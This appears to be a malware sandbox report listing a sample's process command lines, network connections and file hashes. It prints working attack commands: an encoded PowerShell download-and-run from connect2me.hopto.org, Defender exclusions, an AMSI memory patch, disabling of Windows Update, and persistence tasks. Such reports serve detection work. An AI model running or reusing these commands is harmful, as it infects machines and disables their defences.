"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1312 -ip 1312
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1312 -s 140
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:GJQLYgOGMbFF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cQqqaarctPAsWI,[Parameter(Position=1)][Type]$hFfuGqzUTV)$BGwLfQwRIDW=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+'e'+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+'e'+''+[Char](109)+''+'o'+''+'r'+''+'y'+''+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+'a'+'t'+'e'+[Char](84)+''+'y'+''+'p'+''+'e'+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+','+'P'+[Char](117)+''+'b'+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+'e'+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+','+''+[Char](65)+''+'u'+'toC'+[Char](108)+'a'+[Char](115)+''+'s'+'',[MulticastDelegate]);$BGwLfQwRIDW.DefineConstructor('R'+[Char](84)+'S'+[Char](112)+'e'+[Char](99)+''+'i'+''+[Char](97)+''+'l'+''+[Char](78)+''+'a'+'m'+[Char](101)+''+','+'H'+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$cQqqaarctPAsWI).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+''+'e'+'d');$BGwLfQwRIDW.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+'o'+[Char](107)+''+'e'+'',''+'P'+'u'+[Char](98)+'li'+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+'Si'+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+'l'+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$hFfuGqzUTV,$cQqqaarctPAsWI).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+'e'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $BGwLfQwRIDW.CreateType();}$MEyvpdGEQvpuz=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+'.'+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+'s'+'a'+[Char](102)+''+[Char](101)+'M'+[Char](69)+''+'y'+''+'v'+''+[Char](112)+'d'+'G'+'E'+'Q'+''+[Char](118)+''+'p'+'uz');$dlwtQroHtDyLvJ=$MEyvpdGEQvpuz.GetMethod(''+'d'+''+'l'+''+[Char](119)+'t'+'Q'+''+[Char](114)+''+'o'+'H'+'t'+''+[Char](68)+''+[Char](121)+''+[Char](76)+''+'v'+''+'J'+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jWmMooSqutLvbSCCpCO=GJQLYgOGMbFF @([String])([IntPtr]);$iFkBLwbNucYFIqDyBmOftv=GJQLYgOGMbFF @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$QdDUKgMhCpK=$MEyvpdGEQvpuz.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'M'+'o'+''+[Char](100)+''+[Char](117)+'le'+'H'+''+'a'+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+'n'+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$mDZelZfuzhRCAq=$dlwtQroHtDyLvJ.Invoke($Null,@([Object]$QdDUKgMhCpK,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+'L'+''+'i'+''+[Char](98)+'ra'+[Char](114)+''+'y'+'A')));$ZuojooxGrKwfppGKi=$dlwtQroHtDyLvJ.Invoke($Null,@([Object]$QdDUKgMhCpK,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$NkBLXFQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mDZelZfuzhRCAq,$jWmMooSqutLvbSCCpCO).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+'d'+[Char](108)+'l');$XaTgSWOWqOWIYiDiK=$dlwtQroHtDyLvJ.Invoke($Null,@([Object]$NkBLXFQ,[Object](''+[Char](65)+''+'m'+''+'s'+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+'B'+''+'u'+'ff'+[Char](101)+''+[Char](114)+'')));$pGXkLfTnZh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZuojooxGrKwfppGKi,$iFkBLwbNucYFIqDyBmOftv).Invoke($XaTgSWOWqOWIYiDiK,[uint32]8,4,[ref]$pGXkLfTnZh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$XaTgSWOWqOWIYiDiK,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZuojooxGrKwfppGKi,$iFkBLwbNucYFIqDyBmOftv).Invoke($XaTgSWOWqOWIYiDiK,[uint32]8,0x20,[ref]$pGXkLfTnZh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue('d'+[Char](105)+''+'a'+'l'+[Char](101)+''+'r'+''+'s'+''+'t'+'a'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:MTByPtOBIsyf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WLrWkWTRVUjJCG,[Parameter(Position=1)][Type]$PIQWdiUtBy)$rTMvMQRQFax=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+'eT'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+'C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+',A'+[Char](117)+'t'+'o'+'C'+'l'+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$rTMvMQRQFax.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'li'+'c'+'',[Reflection.CallingConventions]::Standard,$WLrWkWTRVUjJCG).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$rTMvMQRQFax.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+'ub'+'l'+''+'i'+''+'c'+','+'H'+''+'i'+'d'+'e'+''+'B'+'yS'+[Char](105)+'g'+[Char](44)+'N'+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+'o'+''+[Char](116)+',Vi'+'r'+''+[Char](116)+''+[Char](117)+'a'+'l'+'',$PIQWdiUtBy,$WLrWkWTRVUjJCG).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+'m'+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $rTMvMQRQFax.CreateType();}$gqftNOfLNdsTg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+'d'+'l'+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+'f'+'t'+'.W'+[Char](105)+''+[Char](110)+''+[Char](51)+'2.U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'g'+[Char](113)+'f'+[Char](116)+''+[Char](78)+''+[Char](79)+''+'f'+''+[Char](76)+''+[Char](78)+''+[Char](100)+''+[Char](115)+''+[Char](84)+''+[Char](103)+'');$DpzZTwbAOZrBoH=$gqftNOfLNdsTg.GetMethod('D'+[Char](112)+''+'z'+''+[Char](90)+''+'T'+''+[Char](119)+'b'+[Char](65)+'O'+[Char](90)+''+[Char](114)+''+[Char](66)+''+'o'+''+'H'+'',[Reflection.BindingFlags]'P'+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+[Char](83)+''+'t'+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KPvGsKRjoqTSJzbytxj=MTByPtOBIsyf @([String])([IntPtr]);$QaeFlqOBJKtOVYeNqgpIwb=MTByPtOBIsyf @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZrSwHqamEXq=$gqftNOfLNdsTg.GetMethod(''+'G'+'e'+[Char](116)+'M'+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+'Ha'+'n'+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'ne'+[Char](108)+'32'+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$TAzoCUEZlZflZv=$DpzZTwbAOZrBoH.Invoke($Null,@([Object]$ZrSwHqamEXq,[Object](''+'L'+'o'+[Char](97)+''+'d'+''+'L'+''+'i'+''+[Char](98)+''+'r'+'ar'+[Char](121)+''+[Char](65)+'')));$lmxCVeANJmtkUoAaM=$DpzZTwbAOZrBoH.Invoke($Null,@([Object]$ZrSwHqamEXq,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+'a'+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$RFxZGwl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TAzoCUEZlZflZv,$KPvGsKRjoqTSJzbytxj).Invoke('a'+'m'+''+'s'+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'');$XrXXvOMLTweGFEvRb=$DpzZTwbAOZrBoH.Invoke($Null,@([Object]$RFxZGwl,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+'u'+''+[Char](102)+'fer')));$pdZJifAPSg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lmxCVeANJmtkUoAaM,$QaeFlqOBJKtOVYeNqgpIwb).Invoke($XrXXvOMLTweGFEvRb,[uint32]8,4,[ref]$pdZJifAPSg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XrXXvOMLTweGFEvRb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lmxCVeANJmtkUoAaM,$QaeFlqOBJKtOVYeNqgpIwb).Invoke($XrXXvOMLTweGFEvRb,[uint32]8,0x20,[ref]$pdZJifAPSg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+[Char](84)+''+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue('d'+[Char](105)+''+[Char](97)+''+[Char](108)+'e'+[Char](114)+'s'+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{b96c8909-50d6-4cea-b72b-ea14bdbe135b}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 544 -p 4248 -ip 4248
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 540 -p 3232 -ip 3232
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3232 -s 988
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4248 -s 392
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 580 -p 3176 -ip 3176
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 536 -p 260 -ip 260
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3176 -s 228
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 556 -p 4008 -ip 4008
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4008 -s 484
Network
| Country | Destination | Domain | Proto |
| N/A | 13.69.239.74:443 | tcp | |
| N/A | 8.247.211.254:80 | tcp | |
| N/A | 8.247.211.254:80 | tcp | |
| N/A | 209.197.3.8:80 | tcp | |
| N/A | 93.184.220.29:80 | tcp | |
| N/A | 93.184.220.29:80 | tcp | |
| N/A | 8.247.211.254:80 | tcp | |
| N/A | 8.247.211.254:80 | tcp | |
| N/A | 8.8.8.8:53 | connect2me.hopto.org | udp |
| N/A | 37.139.129.113:443 | connect2me.hopto.org | tcp |
| N/A | 107.182.129.73:21733 | tcp |
Files
memory/1796-132-0x0000000000000000-mapping.dmp
memory/1796-133-0x0000000000400000-0x0000000000405000-memory.dmp
memory/1796-139-0x0000000000400000-0x0000000000405000-memory.dmp
memory/1324-140-0x0000000000000000-mapping.dmp
memory/1324-141-0x0000000002BC0000-0x0000000002BF6000-memory.dmp
memory/1324-142-0x0000000005460000-0x0000000005A88000-memory.dmp
memory/1324-143-0x0000000005210000-0x0000000005232000-memory.dmp
memory/1324-144-0x0000000005B40000-0x0000000005BA6000-memory.dmp
memory/1324-145-0x0000000005BB0000-0x0000000005C16000-memory.dmp
memory/1324-146-0x00000000061A0000-0x00000000061BE000-memory.dmp
memory/1324-147-0x0000000006760000-0x0000000006792000-memory.dmp
memory/1324-148-0x0000000070F60000-0x0000000070FAC000-memory.dmp
memory/1324-149-0x0000000006740000-0x000000000675E000-memory.dmp
memory/1324-150-0x0000000007BE0000-0x000000000825A000-memory.dmp
memory/1324-151-0x00000000067E0000-0x00000000067FA000-memory.dmp
memory/1324-152-0x00000000075C0000-0x00000000075CA000-memory.dmp
memory/1324-153-0x00000000077C0000-0x0000000007856000-memory.dmp
memory/1324-154-0x0000000007580000-0x000000000758E000-memory.dmp
memory/1324-155-0x0000000007880000-0x000000000789A000-memory.dmp
memory/1324-156-0x0000000007860000-0x0000000007868000-memory.dmp
memory/1324-157-0x00000000078E0000-0x0000000007902000-memory.dmp
memory/1324-158-0x0000000008810000-0x0000000008DB4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
